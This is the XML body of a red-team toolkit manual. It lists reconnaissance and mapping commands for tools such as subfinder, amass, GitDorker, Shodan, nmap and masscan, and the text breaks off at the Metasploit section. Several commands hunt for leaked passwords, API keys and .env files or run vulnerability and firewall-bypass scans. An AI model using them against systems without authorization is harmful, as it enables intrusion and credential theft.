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b2f505558afe4863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3ea2f0baa5c34b0d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200"/>
        <w:ind w:left="1200" w:right="1200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="3fb950"/>
          <w:spacing w:val="60"/>
          <w:sz w:val="88"/>
        </w:rPr>
        <w:t>Sec Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:ind w:left="1200" w:right="1200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="8b949e"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>A Comprehensive Red Team Operations Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="1200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="6e7681"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10 Phases  |  100 Tools  |  1000 Modes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="1200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="6e7681"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Authorized Security Testing  |  June 2026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Phase 1: Recon</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 2: Mapping</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 3: Access</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>27</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 4: Delivery</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>39</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 5: Escalation</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>51</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 6: Credentials</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>63</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 7: Movement</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>75</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 8: Persistence</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>87</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 9: Objectives</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>99</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 10: Wireless</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>111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Phase 1: Recon</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc001" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Systematic collection of open-source intelligence to map target infrastructure, identify assets, and build a foundation for subsequent attack phases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>This phase emphasizes passive and semi-passive techniques that minimize direct interaction with target systems while maximizing data yield and precision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Subfinder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A blazing-fast subdomain discovery tool by ProjectDiscovery that passively enumerates subdomains using 100+ verified sources. Optimized for speed with clean, parseable output ideal for pipeline integration.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subfinder -d $DOMAIN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subfinder -d $DOMAIN -all -recursive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subfinder -d $DOMAIN -sources censys,shodan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subfinder -d $DOMAIN -silent | httpx -title -tech-detect -status-code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subfinder -d $DOMAIN -exclude-sources dnsdumpster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subfinder -d $DOMAIN -proxy http://$PROXY -timeout 30 -o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subfinder -d $DOMAIN -max-time 5 -silent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subfinder -d $DOMAIN -json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subfinder -d $DOMAIN -silent | sort -u | wc -l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subfinder -d $DOMAIN -config $CONFIG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subfinder -d $DOMAIN -nW -o $OUTPUT -r $RESOLVER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Amass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The most comprehensive attack surface mapping tool for DNS enumeration and network mapping. Uses both active and passive techniques with deep recursive enumeration against root domains.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amass enum -d $DOMAIN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amass enum -passive -d $DOMAIN -src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amass enum -active -d $DOMAIN -brute -w $WORDLIST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amass enum -d $DOMAIN -config $CONFIG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amass intel -org '$ORG'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amass intel -whois -d $DOMAIN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amass enum -d $DOMAIN -min-for-recursive 3 -o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amass enum -d $DOMAIN -demo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amass enum -d $DOMAIN -ef $EXCLUDE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amass enum -d $DOMAIN -ipv4 -o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amass viz -d3 -o $OUTPUT_DIR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. theHarvester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Classic email harvesting and subdomain discovery tool that queries search engines, PGP servers, and SHODAN. Remains effective for identifying contact points and exposed services.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theHarvester -d $DOMAIN -b all -f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theHarvester -d $DOMAIN -b google,bing,yahoo -f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theHarvester -d $DOMAIN -b shodan -c $SHODAN_KEY -f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theHarvester -d $DOMAIN -b linkedin -f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theHarvester -d $DOMAIN -b crtsh -f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theHarvester -d $DOMAIN -b hackertarget -f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theHarvester -d $DOMAIN -b omnisint -f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theHarvester -d $DOMAIN -b anubis -f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theHarvester -d $DOMAIN -b urlscan -f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theHarvester -d $DOMAIN -b dnsdumpster -f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theHarvester -d $DOMAIN -b virustotal -f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4. gau (GetAllUrls)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lightning-fast URL enumeration tool that fetches known URLs from AlienVault's OTX, Wayback Machine, and Common Crawl. Essential for discovering historical endpoints and attack surface expansion.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gau --threads 5 $DOMAIN | sort -u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gau --threads 10 --subs $DOMAIN | sort -u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gau --threads 5 --blacklist png,jpg,gif $DOMAIN | sort -u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gau --threads 5 --providers wayback $DOMAIN | sort -u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gau --threads 5 --providers otx $DOMAIN | sort -u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gau --threads 5 --providers commoncrawl $DOMAIN | sort -u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gau --threads 5 --fc 404 $DOMAIN | sort -u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gau --threads 5 --ft json,xml $DOMAIN | sort -u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gau --threads 5 --from 2024 $DOMAIN | sort -u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gau --threads 5 --json $DOMAIN | sort -u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cat $DOMAIN_LIST | gau --threads 5 | sort -u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5. Waybackurls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Simple yet effective tool for extracting URLs from the Wayback Machine. Its speed and simplicity make it indispensable for quickly surfacing historical endpoints and changed attack surfaces.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waybackurls $DOMAIN | sort -u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waybackurls $DOMAIN | grep -E '\.(js|json|xml)$' | sort -u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waybackurls $DOMAIN | grep -i 'api' | sort -u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waybackurls $DOMAIN | grep -i 'admin' | sort -u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waybackurls $DOMAIN | grep -E 'token|key|secret|password' | sort -u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waybackurls $DOMAIN | unfurl --unique keys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cat $DOMAIN_LIST | waybackurls | sort -u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waybackurls $DOMAIN | httpx -silent -status-code -title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waybackurls $DOMAIN | grep -v '\.(png|jpg|gif|css)$' | sort -u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waybackurls $DOMAIN | awk -F'?' '{print $1}' | sort -u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waybackurls $DOMAIN | grep -E 'redirect=|url=|next=|return=' | sort -u &gt;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6. GitDorker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Automated GitHub dorking tool that searches for sensitive files, credentials, and exposed configuration in public repositories. Leverages the GitHub Search API for precise results.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GitDorker.py -tf $TOKENS_FILE -q $DOMAIN -p -d $DORKS_FILE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GitDorker.py -tf $TOKENS_FILE -q 'org:$ORG' -p -d $DORKS_FILE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GitDorker.py -tf $TOKENS_FILE -q '$DOMAIN password' -p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GitDorker.py -tf $TOKENS_FILE -q '$DOMAIN API_KEY' -p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GitDorker.py -tf $TOKENS_FILE -q '$DOMAIN secrets' -p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GitDorker.py -tf $TOKENS_FILE -q '$DOMAIN token' -p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GitDorker.py -tf $TOKENS_FILE -q '$DOMAIN config' -p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GitDorker.py -tf $TOKENS_FILE -q 'filename:db_password $DOMAIN' -p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GitDorker.py -tf $TOKENS_FILE -q 'filename:.env $DOMAIN' -p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GitDorker.py -tf $TOKENS_FILE -q '$DOMAIN extension:json' -p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GitDorker.py -tf $TOKENS_FILE -q '$DOMAIN extension:yaml' -p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7. Shodan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The definitive search engine for internet-connected devices. Its CLI enables rapid discovery of exposed services, vulnerabilities, and network topology across global infrastructure.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shodan search --fields ip_str,port,hostnames,org 'hostname:$DOMAIN'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shodan search --fields ip_str,port,title 'ssl:$DOMAIN'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shodan search --fields ip_str,port,os '$QUERY'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shodan host $IP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shodan count '$QUERY'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shodan download $OUTPUT_FILE '$QUERY'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shodan parse --fields ip_str,port,ssl.cert.serial $OUTPUT_FILE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shodan search --fields ip_str,port,vulns 'vuln:$CVE'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shodan search --fields ip_str,port,location.country_code 'asn:$ASN'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shodan stats --facets org,os,port '$QUERY'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shodan honeyscore $IP &gt;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8. Censys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Enterprise-grade internet asset discovery platform with granular search syntax. Provides structured data on hosts, certificates, and websites with superior accuracy for cloud asset enumeration.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censys search 'services.http.response.html_title: "$TITLE"' --index-type hosts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censys search 'services.tls.certificates.leaf_data.subject.common_name: $DOMAIN' --index-type hosts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censys search 'services.port: $PORT and services.service_name: $SERVICE' --index-type hosts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censys search 'ip: $IP' --index-type hosts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censys search 'autonomous_system.name: "$ASN_NAME"' --index-type hosts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censys search 'services.software.vendor: $VENDOR' --index-type hosts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censys view $IP $AT_TIME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censys search 'services.http.response.favicons.md5_hash: $FAVICON_HASH' --index-type hosts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censys search 'dns.names: $DOMAIN' --index-type hosts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censys search 'services.jarm.fingerprint: $JARM_HASH' --index-type hosts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censys search 'services.tls.certificates.leaf_data.issuer.common_name: "$CA"' --index-type hosts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9. CloudBrute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Specialized cloud asset discovery tool that brute-forces cloud storage buckets, applications, and infrastructure across AWS, GCP, Azure, and Alibaba. Essential for cloud attack surface enumeration.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CloudBrute -d $DOMAIN -k $KEYWORD -m storage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CloudBrute -d $DOMAIN -k $KEYWORD -m storage -t 80 -T 10 -o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CloudBrute -d $DOMAIN -k $KEYWORD -m storage --provider aws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CloudBrute -d $DOMAIN -k $KEYWORD -m storage --provider gcp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CloudBrute -d $DOMAIN -k $KEYWORD -m storage --provider azure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CloudBrute -d $DOMAIN -k $KEYWORD -m app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CloudBrute -d $DOMAIN -k $KEYWORD -m app --provider aws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CloudBrute -d $DOMAIN -k $KEYWORD -m app --wordlist $WORDLIST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CloudBrute -d $DOMAIN -k $KEYWORD -m storage --check-perm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CloudBrute -d $DOMAIN -k $KEYWORD -m storage --proxy $PROXY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CloudBrute -d $DOMAIN -k $KEYWORD -m storage --max-size 1000 -o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10. ASNLookup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Swift autonomous system number enumeration tool that maps organizational IP ranges through BGP data. Critical for discovering out-of-scope assets and understanding network boundaries.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asnlookup -o $ORG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asnlookup -d $DOMAIN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asnlookup -o '$ORG' --format json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asnlookup -o '$ORG' --format csv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asnlookup -d $DOMAIN --resolve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asnlookup -n $ASN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asnlookup -o '$ORG' --ipv6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asnlookup -o '$ORG' --format raw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asnlookup -d $DOMAIN --format cidr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asnlookup -o '$ORG' --format nmap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asnlookup -o '$ORG' --format masscan &gt; $OUTPUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 2: Mapping</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc002" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Active enumeration and fingerprinting of discovered assets to build a precise attack surface map. This phase transforms raw host lists into actionable intelligence about live services, technologies, and vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Tools in this phase prioritize speed, accuracy, and clean output that integrates seamlessly into automated pipeline workflows for continuous assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. HTTPX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ProjectDiscovery's fast and multi-purpose HTTP toolkit. Probes thousands of hosts per minute with accurate status codes, title extraction, technology detection, and screenshot capture in a single pass.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httpx -l $HOSTS -silent -sc -title -tech-detect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httpx -l $HOSTS -silent -probe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httpx -l $HOSTS -silent -sc -title -cl -server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httpx -l $HOSTS -silent -td -ip -cname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httpx -l $HOSTS -silent -fc 404,500 -o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httpx -l $HOSTS -silent -mc 200,301,302 -o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httpx -l $HOSTS -silent -tls-grab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httpx -l $HOSTS -silent -favicon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httpx -l $HOSTS -silent -jarm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httpx -l $HOSTS -silent -screenshot -srd $DIR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httpx -l $HOSTS -silent -path $PATH -sc -title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2. Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The undisputed standard for network discovery and security auditing. 25+ years of development with the NSE scripting engine providing 600+ scripts for service detection, vulnerability scanning, and exploitation.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nmap -sS -T4 -p- --min-rate 1000 -oN $OUTPUT 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nmap -sV -sC -O -T4 -oN $OUTPUT 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nmap -sS -sV --script vuln -T4 -oN $OUTPUT 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nmap -p $PORTS --script http-title,http-server-header -oN $OUTPUT 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nmap -sU --top-ports 100 -T4 -oN $OUTPUT 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nmap --script smb-os-discovery,smb-enum-shares -p 445 -oN $OUTPUT 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nmap --script ssl-cert,ssl-enum-ciphers -p 443 -oN $OUTPUT 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nmap -sn -PE -PP -PM -oN $OUTPUT $NETWORK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nmap -sS --script firewall-bypass -T4 -oN $OUTPUT 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nmap --script dns-brute --script-args dns-brute.domain=$DOMAIN -oN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nmap -sS -sV --script banner-plus -T4 -oN $OUTPUT $TARGET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Naabu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ProjectDiscovery's port scanning tool designed for speed and efficiency. Written in Go, it performs SYN/CONNECT/UDP scans with automatic IP deduplication and service fingerprinting integration.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naabu -list $HOSTS -top-ports 100 -silent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naabu -host $TARGET -p -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naabu -list $HOSTS -p 80,443,8080,8443 -silent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naabu -list $HOSTS -top-ports 1000 -rate 1000 -silent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naabu -list $HOSTS -p- -exclude-ports 445,3389 -silent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naabu -list $HOSTS -scan-type s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naabu -list $HOSTS -scan-type c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naabu -host $TARGET -p 1-65535 -nmap-cli 'nmap -sV -sC'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naabu -list $HOSTS -json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naabu -list $HOSTS -verify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naabu -list $HOSTS -stats -silent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4. Masscan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The fastest Internet-scale port scanner capable of scanning the entire IPv4 space in under 6 minutes. Uses its own custom TCP/IP stack for unparalleled speed in broad network reconnaissance.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masscan $NETWORK -p0-65535 --rate 10000 -oG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masscan $NETWORK -p80,443,8080,8443 --rate 50000 -oG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masscan $NETWORK -pU:53,69,123,161 --rate 10000 -oG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masscan $NETWORK -p22,23,3389,5900 --rate 20000 -oG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masscan $NETWORK -p0-65535 --excludefile $EXCLUDES --rate 10000 -oG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masscan -iL $IP_LIST -p80,443 --rate 30000 -oG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masscan $NETWORK -p445 --banners --rate 10000 -oG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masscan $NETWORK -p0-65535 --randomize-hosts --rate 10000 -oG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masscan $NETWORK -p0-65535 --retries 0 --rate 50000 -oG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masscan $NETWORK -p21,22,23,25,53,80,110,143,443,993,995,3306,3389,5900,8080 --rate 20000 -oG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masscan $NETWORK -p0-65535 --capture cert --rate 10000 -oG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5. RustScan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Modern port scanner written in Rust that finds open ports 50x faster than Nmap. Auto-pipes results into Nmap for service detection, combining raw speed with comprehensive analysis.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rustscan -a $TARGET -- -sV -sC -oN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rustscan -a $TARGET -p 1-65535 -- -sV -oN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rustscan -a $TARGET -t 1500 -- -sV -sC -oN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rustscan --addresses $IP_LIST -- -sV -sC -oN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rustscan -a $TARGET --scripts none -- -Pn -oN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rustscan -a $TARGET --range 1-1000 -- -sV -oN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rustscan -a $TARGET -b 2500 -- -A -oN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rustscan --addresses $IP_FILE --top -- -sV -oN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rustscan -a $TARGET --accessible -- -sV -oN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rustscan -a $TARGET -p 22,80,443,445,3389 -- -sV -sC -oN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rustscan -a $TARGET --scan-order serial -- -sV -oN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6. TLSx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ProjectDiscovery's fast and configurable TLS connection analyzer. Extracts certificates, cipher suites, TLS versions, and JA3/JARM fingerprints for security assessment and correlation.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tlsx -l $HOSTS -silent -cn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tlsx -l $HOSTS -silent - fingerprints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tlsx -l $HOSTS -silent -jarm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tlsx -l $HOSTS -silent -vc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tlsx -l $HOSTS -silent - expired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tlsx -l $HOSTS -silent -self-signed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tlsx -l $HOSTS -silent -cipher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tlsx -l $HOSTS -silent -tls-version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tlsx -l $HOSTS -silent -so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tlsx -l $HOSTS -silent -wc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tlsx -l $HOSTS -silent -probe-fast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7. Webanalyze</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fast technology fingerprinting tool that detects web technologies, frameworks, CMS platforms, and JavaScript libraries. Uses curated signatures for accurate detection with minimal false positives.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webanalyze -hosts $HOSTS -output csv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webanalyze -hosts $HOSTS -output json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webanalyze -hosts $HOSTS -apps $APPS_JSON -output csv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webanalyze -update &amp;&amp; webanalyze -hosts $HOSTS -output csv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cat $URLS | webanalyze -output csv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webanalyze -hosts $HOSTS -worker 50 -output csv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webanalyze -hosts $HOSTS -redirect 5 -output csv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webanalyze -hosts $HOSTS -user-agent '$UA' -output csv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webanalyze -hosts $HOSTS -search $TECH -output csv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webanalyze -hosts $HOSTS -crawl 2 -output csv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webanalyze -hosts $HOSTS -timeout 15 -output csv &gt;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8. WhatWeb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Next-generation web scanner that identifies technologies running on websites using 1800+ plugins. Recognizes content management systems, blogs, statistic packages, and JavaScript libraries.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whatweb $URL --log-json=$OUTPUT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whatweb $URL -a 3 --log-json=$OUTPUT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whatweb -i $URL_FILE --log-json=$OUTPUT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whatweb $URL --plugins +,$PLUGIN --log-json=$OUTPUT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whatweb $URL --user-agent '$UA' --log-json=$OUTPUT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whatweb $URL --proxy $PROXY --log-json=$OUTPUT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whatweb $URL --custom-plugin $PLUGIN_DEF --log-json=$OUTPUT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whatweb $URL --follow-redirect never --log-json=$OUTPUT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whatweb -i $URL_FILE -- aggression 4 --log-json=$OUTPUT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whatweb $URL --colour never --log-json=$OUTPUT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whatweb $URL -v --log-json=$OUTPUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9. Uncover</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ProjectDiscovery's search engine aggregator that queries Shodan, Censys, and FOFA to discover exposed assets. Provides unified syntax for multi-platform intelligence gathering with clean CLI output.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uncover -q '$QUERY' -e shodan,censys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uncover -q 'ssl.cert.subject.cn:"$DOMAIN"' -e shodan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uncover -q '$QUERY' -e censys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uncover -q '$QUERY' -e fofa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uncover -q '$QUERY' -e shodan -l 1000 -o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uncover -q 'hostname:$DOMAIN' -e shodan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uncover -q '$QUERY' -e shodan,censys -json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uncover -q '$QUERY' -e shodan -field ip:port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uncover -q '$QUERY' -e shodan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uncover -q '$QUERY' -e shodan -timeout 30 -o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uncover -q '$QUERY' -e shodan,censys,fofa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10. DNSx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ProjectDiscovery's fast and multi-purpose DNS toolkit. Performs DNS resolution, brute-forcing, wildcard filtering, and DNSSEC verification with exceptional throughput and clean output.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dnsx -l $DOMAINS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dnsx -l $DOMAINS -a -resp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dnsx -l $DOMAINS -aaaa -resp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dnsx -l $DOMAINS -mx -resp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dnsx -l $DOMAINS -ns -resp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dnsx -l $DOMAINS -txt -resp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dnsx -l $DOMAINS -cname -resp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dnsx -d $WORDLIST -domain $DOMAIN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dnsx -l $DOMAINS -ptr -resp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dnsx -l $DOMAINS -soa -resp -silent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dnsx -l $DOMAINS -json -silent -o $OUTPUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 3: Access</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc003" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Establishing the first foothold within target infrastructure through exploitation of exposed services, application vulnerabilities, and human attack vectors. This phase bridges reconnaissance to active engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Each tool is selected for its proven effectiveness in real-world scenarios, precise output, and seamless integration with post-exploitation workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
